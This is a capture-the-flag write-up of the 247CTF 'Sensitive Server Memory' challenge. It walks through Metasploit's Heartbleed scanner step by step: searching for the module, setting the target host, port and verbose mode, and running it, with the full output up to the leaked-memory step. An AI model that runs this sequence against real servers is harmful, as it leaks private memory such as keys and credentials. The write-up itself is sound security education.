This is my write-up of a Misc challenge Sensitive Server Memory on the CTF site 247CTF.com.
The webserver for this challenge is storing sensitive data in memory. Can you read it? Did anybody patch since 2014?
The greatest bug of 2014 was Heartbleed, so lets start with that.
Spin up your Kali Linux and enter Metasploit.
kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.72-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >
Search the exploit database for anything heartbleed related:
msf5 > search heartbleed
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak
1 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
Select the auxiliary/scanner/ssl/openssl_heartbleed:
msf5 > use 0
Check which options need to be set:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
---- -----------
SCAN Check hosts for vulnerability
Set rhosts to domain provided by challenge:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 202f6701de93bfbe.247ctf.com
rhosts => 202f6701de93bfbe.247ctf.com
Set rport to the port provided by challeng:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 50071
rport => 50071
We need verbose set to true, so we can see the data that is leaking:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
Run the exploit:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 144.76.74.118:50071 - Leaking heartbeat response #1
[*] 144.76.74.118:50071 - Sending Client Hello...
[*] 144.76.74.118:50071 - SSL record #1:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 86
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 82
[*] 144.76.74.118:50071 - Type: Server Hello (2)
[*] 144.76.74.118:50071 - Server Hello Version: 0x0301
[*] 144.76.74.118:50071 - Server Hello random data: 20fe119d01d3ac29d5c59761e743d5d48ca8acfd23060efbff11cea2b68c08f7
[*] 144.76.74.118:50071 - Server Hello Session ID length: 32
[*] 144.76.74.118:50071 - Server Hello Session ID: 44fa4cb2ca1d11afa085d439bd12e8f023e7155f5923c41bf93d8b9b3e64ed82
[*] 144.76.74.118:50071 - SSL record #2:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 821
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 817
[*] 144.76.74.118:50071 - Type: Certificate Data (11)
[*] 144.76.74.118:50071 - Certificates length: 814
[*] 144.76.74.118:50071 - Data length: 817
[*] 144.76.74.118:50071 - Certificate #1:
[*] 144.76.74.118:50071 - Certificate #1: Length: 811
[*] 144.76.74.118:50071 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, issuer=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, serial=#<OpenSSL::BN:0x0000558d6e19f950>, not_before=2019-02-12 21:20:09 UTC, not_after=2069-01-30 21:20:09 UTC>
[*] 144.76.74.118:50071 - SSL record #3:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 331
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 327
[*] 144.76.74.118:50071 - Type: Server Key Exchange (12)
[*] 144.76.74.118:50071 - SSL record #4:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 4
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 0
[*] 144.76.74.118:50071 - Type: Server Hello Done (14)
[*] 144.76.74.118:50071 - Sending Heartbeat...
[*] 144.76.74.118:50071 - Heartbeat response, 65535 bytes
[+] 144.76.74.118:50071 - Heartbeat response with leak, 65535 bytes
[*] 144.76.74.118:50071 - Printable info leaked:
############## FLAG in the leaked data
[*] 202f6701de93bfbe.247ctf.com:50071 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) >
Bingo!